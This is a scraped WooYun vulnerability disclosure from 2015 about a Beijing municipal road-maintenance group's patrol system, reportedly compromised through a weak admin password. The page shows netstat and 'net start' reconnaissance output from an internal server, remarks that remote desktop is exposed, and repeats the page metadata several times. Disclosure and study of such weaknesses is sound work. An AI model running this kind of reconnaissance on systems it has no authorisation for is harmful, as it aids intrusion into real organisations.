  UDP    0.0.0.0:26231          *:*                    
  UDP    0.0.0.0:26290          *:*                    
  UDP    0.0.0.0:26292          *:*                    
  UDP    0.0.0.0:26761          *:*                    
  UDP    0.0.0.0:27252          *:*                    
  UDP    0.0.0.0:27766          *:*                    
  UDP    0.0.0.0:28095          *:*                    
  UDP    0.0.0.0:28099          *:*                    
  UDP    0.0.0.0:28305          *:*                    
  UDP    0.0.0.0:28871          *:*                    
  UDP    0.0.0.0:29481          *:*                    
  UDP    0.0.0.0:29991          *:*                    
  UDP    0.0.0.0:30099          *:*                    
  UDP    0.0.0.0:30736          *:*                    
  UDP    0.0.0.0:31028          *:*                    
  UDP    0.0.0.0:31404          *:*                    
  UDP    0.0.0.0:31904          *:*                    
  UDP    0.0.0.0:32087          *:*                    
  UDP    0.0.0.0:32800          *:*                    
  UDP    0.0.0.0:33535          *:*                    
  UDP    0.0.0.0:33829          *:*                    
  UDP    0.0.0.0:33992          *:*                    
  UDP    0.0.0.0:34296          *:*                    
  UDP    0.0.0.0:35078          *:*                    
  UDP    0.0.0.0:35801          *:*                    
  UDP    0.0.0.0:35882          *:*                    
  UDP    0.0.0.0:36717          *:*                    
  UDP    0.0.0.0:36987          *:*                    
  UDP    0.0.0.0:37583          *:*                    
  UDP    0.0.0.0:37782          *:*                    
  UDP    0.0.0.0:38465          *:*                    
  UDP    0.0.0.0:39372          *:*                    
  UDP    0.0.0.0:39789          *:*                    
  UDP    0.0.0.0:40016          *:*                    
  UDP    0.0.0.0:40303          *:*                    
  UDP    0.0.0.0:41265          *:*                    
  UDP    0.0.0.0:41821          *:*                    
  UDP    0.0.0.0:42247          *:*                    
  UDP    0.0.0.0:43068          *:*                    
  UDP    0.0.0.0:43254          *:*                    
  UDP    0.0.0.0:43822          *:*                    
  UDP    0.0.0.0:44284          *:*                    
  UDP    0.0.0.0:45341          *:*                    
  UDP    0.0.0.0:45858          *:*                    
  UDP    0.0.0.0:46219          *:*                    
  UDP    0.0.0.0:46444          *:*                    
  UDP    0.0.0.0:47549          *:*                    
  UDP    0.0.0.0:47917          *:*                    
  UDP    0.0.0.0:48678          *:*                    
  UDP    0.0.0.0:49361          *:*                    
  UDP    0.0.0.0:49841          *:*                    
  UDP    0.0.0.0:49997          *:*                    
  UDP    0.0.0.0:51020          *:*                    
  UDP    0.0.0.0:52128          *:*                    
  UDP    0.0.0.0:52246          *:*                    
  UDP    0.0.0.0:52496          *:*                    
  UDP    0.0.0.0:53473          *:*                    
  UDP    0.0.0.0:54255          *:*                    
  UDP    0.0.0.0:54731          *:*                    
  UDP    0.0.0.0:55659          *:*                    
  UDP    0.0.0.0:56017          *:*                    
  UDP    0.0.0.0:56416          *:*                    
  UDP    0.0.0.0:57315          *:*                    
  UDP    0.0.0.0:58598          *:*                    
  UDP    0.0.0.0:58646          *:*                    
  UDP    0.0.0.0:58855          *:*                    
  UDP    0.0.0.0:59990          *:*                    
  UDP    0.0.0.0:60828          *:*                    
  UDP    0.0.0.0:61373          *:*                    
  UDP    0.0.0.0:62085          *:*                    
  UDP    0.0.0.0:64758          *:*                    
  UDP    0.0.0.0:65036          *:*                    
  UDP    127.0.0.1:123          *:*                    
  UDP    172.18.28.10:123       *:*                    
  UDP    172.18.28.10:137       *:*                    
  UDP    172.18.28.10:138       *:*

net start

已经启动以下 Windows 服务: 
   Application Experience Lookup Service
   Application Layer Gateway Service
   ArcIMS Application Server 9.2.0
   ArcIMS Monitor 9.2.0
   ArcIMS Tasker 9.2.0
   Automatic Updates
   COM+ Event System
   Computer Browser
   CreCloud Agent
   CreCloud DM
   CreCloud Task Server
   CreCloud WebExpress
   Cryptographic Services
   DCOM Server Process Launcher
   DHCP Client
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Error Reporting Service
   Event Log
   GPS
   Help and Support
   HP ProLiant System Shutdown Service
   IPSEC Services
   Logical Disk Manager
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Protected Storage
   Remote Access Auto Connection Manager
   Remote Access Connection Manager
   Remote Administrator Service
   Remote Procedure Call (RPC)
   Remote Registry
   Security Accounts Manager
   Server
   Shell Hardware Detection
   SHORTPATH
   SQL Server (MSSQLSERVER)
   SQL Server Integration Services 10.0
   SQL Server 代理 (MSSQLSERVER)
   System Event Notification
   Task Scheduler
   TCP/IP NetBIOS Helper
   Telephony
   Terminal Services
   Windows Firewall/Internet Connection Sharing (ICS)
   Windows Management Instrumentation
   Windows Time
   Workstation
命令成功完成。

3389竟然开启。呵呵

漏洞证明：

修复方案：

加强安全意识

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-05-30 21:56

厂商回复：

已经由CNVD通过网站公开联系方式（或以往建立的处置渠道）向网站管理单位（软件生产厂商）通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116220

漏洞标题：北京市政路桥管理养护集团巡查管理系统沦陷/内网漫游等安全影响

相关厂商：北京市政路桥管理养护集团

漏洞作者：朱元璋

提交时间：2015-05-26 10:16

修复时间：2015-07-14 21:58

公开时间：2015-07-14 21:58

漏洞类型：后台弱口令

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116220

漏洞标题：北京市政路桥管理养护集团巡查管理系统沦陷/内网漫游等安全影响

相关厂商：北京市政路桥管理养护集团

漏洞作者： 朱元璋

提交时间：2015-05-26 10:16

修复时间：2015-07-14 21:58

公开时间：2015-07-14 21:58

漏洞类型：后台弱口令

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0116220"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：朱元璋

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源朱元璋@乌云